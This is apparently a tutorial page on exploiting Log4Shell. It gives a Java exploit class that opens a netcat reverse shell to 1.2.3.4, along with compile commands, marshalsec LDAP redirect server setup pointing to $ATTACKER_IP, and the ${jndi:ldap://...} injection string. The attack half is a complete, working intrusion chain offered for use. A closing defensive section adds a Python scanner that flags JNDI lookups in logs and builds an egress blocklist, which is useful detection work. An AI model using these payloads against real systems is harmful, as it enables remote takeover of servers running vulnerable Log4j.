Reverse shell

A simple Java exploit that pops a reverse shell (at least on Linux systems whose netcat supports the -e switch) is:

public class Exploit {
	// Static initializer: runs as soon as the class is loaded by the victim JVM,
	// so nothing needs to call a method on it explicitly.
	static {
		try {
			// exec(String) splits the command on whitespace, which is fine here.
			java.lang.Runtime.getRuntime().exec("nc -e /bin/bash 1.2.3.4 9999");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

Where 1.2.3.4 is the IP address you are catching the reverse shell on and 9999 is the port of the listener. This can be compiled with:

javac Exploit.java -source 8 -target 8

Note that the -source and -target flags may need to be adjusted to match the version of Java the target is running. As with all things Java, the file name and the class name must match.

Delivery with Log4Shell

Delivery through a vulnerable version of Log4j is a four-step process: Malicious string → LDAP lookup → load Java code over HTTP → reverse shell.

A simple Java LDAP server that will handle redirects is available at https://github.com/mbechler/marshalsec. It can be built with Apache Maven using the version of OpenJDK supplied with Kali Linux:

mvn clean package -DskipTests

Then run with:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar \
         marshalsec.jndi.LDAPRefServer \
         "http://$ATTACKER_IP:$ATTACKER_PORT/#Exploit"

Where $ATTACKER_IP and $ATTACKER_PORT are the IP address and port of the HTTP server that will actually serve the exploit class.

Once that is running, you only need a quick web server to serve the exploit class (such as the reverse shell example above) and a netcat listener, and then a way to get the malicious string (${jndi:ldap://1.2.3.4:1389/Exploit}, where 1.2.3.4 is the $ATTACKER_IP above and 1389 is the port the LDAP server listens on) somewhere the vulnerable application will log it.

Note that a number of other protocols are supported besides LDAP (the marshalsec server supports a few).
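On the defending side, the delivery string above and the "other protocols" note give the pattern a log scanner needs: a ${jndi:<scheme>:...} lookup followed by the host and port the vulnerable JVM would connect out to. The following is an added example, not code from the page or from the marshalsec project; it assumes Apache-style access-log lines, and every sample line below is constructed for the demonstration rather than taken from a real system. It flags each lookup, parses the callback destination, and builds the set of host/port pairs to block at the egress firewall while the application is patched.

```python
"""Scan access-log lines for Log4Shell-style ${jndi:...} lookup strings.

Added example (not part of the original page): detects the lookup syntax
described above, extracts the scheme, host and port the lookup would reach
out to, and derives an egress blocklist from the findings.
"""
import re
from urllib.parse import urlsplit

# Constructed sample lines in Apache-style access-log format (not real data).
# Line 2 carries the page's LDAP string in the User-Agent, line 3 an RMI
# variant in the query string, line 4 a harmless non-JNDI Log4j lookup.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://1.2.3.4:1389/Exploit}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${jndi:rmi://1.2.3.4:1099/Exploit} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:12:00:04 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]

# ${jndi:<scheme>:<rest>} as shown on the page. <rest> runs to the closing
# brace; whitespace is excluded so a stray '}' later on the line cannot make
# one match swallow the remainder of the record. Case-insensitive matching
# is a cheap extra guard that costs nothing on benign lines.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z][a-z0-9+.-]*):(?P<rest>[^}\s]+)\}",
    re.IGNORECASE,
)


def parse_lookup(scheme: str, rest: str) -> dict:
    """Split a lookup target such as ldap://1.2.3.4:1389/Exploit into parts."""
    parts = urlsplit(f"{scheme.lower()}:{rest}")
    try:
        port = parts.port  # None when no explicit port was given
    except ValueError:  # malformed port: keep the finding, drop the port
        port = None
    return {
        "scheme": scheme.lower(),
        "host": parts.hostname,
        "port": port,
        "path": parts.path,
    }


def scan_log_lines(lines):
    """Return one finding (dict) per JNDI lookup string found in the lines."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for match in JNDI_LOOKUP.finditer(line):
            finding = parse_lookup(match.group("scheme"), match.group("rest"))
            finding.update({"line_no": line_no, "raw": match.group(0)})
            findings.append(finding)
    return findings


def egress_blocklist(findings):
    """Distinct (host, port) pairs the victim JVM would have connected to."""
    return {(f["host"], f["port"]) for f in findings if f["host"]}


if __name__ == "__main__":
    results = scan_log_lines(SAMPLE_LOG_LINES)
    for f in results:
        print(f"line {f['line_no']}: {f['scheme']} lookup -> "
              f"{f['host']}:{f['port']}{f['path']}  ({f['raw']})")
    print("block at egress:", sorted(egress_blocklist(results), key=str))
```

Running the block prints the two lookups (lines 2 and 3) and the blocklist {("1.2.3.4", 1389), ("1.2.3.4", 1099)}; the ${date:yyyy} lookup on line 4 is ignored because the regex requires the jndi prefix. The scanner only matches the literal form the page shows, so it is a triage and containment aid that complements patching Log4j rather than a substitute for it.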